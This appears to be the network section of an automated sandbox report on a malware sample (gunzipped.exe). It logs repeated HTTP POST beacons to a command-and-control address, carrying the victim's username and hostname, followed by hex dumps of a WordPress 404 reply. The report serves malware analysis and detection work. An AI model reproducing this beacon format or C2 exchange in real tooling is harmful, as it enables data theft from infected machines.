3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:16:53.501759052 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:53.501770973 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:53.501782894 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:53.501853943 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:16:53.501866102 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:53.501877069 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:53.501888990 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:53.501900911 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:53.501916885 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:53.759072065 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:16:53.962456942 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:16:54.978631020 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:16:54.978657961 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:54.978676081 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:54.978694916 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:54.978717089 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:16:54.978738070 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:54.978756905 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:54.978775024 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:54.978792906 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:54.978821993 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:55.317147970 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:16:55.520426035 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:16:56.425553083 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:55 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
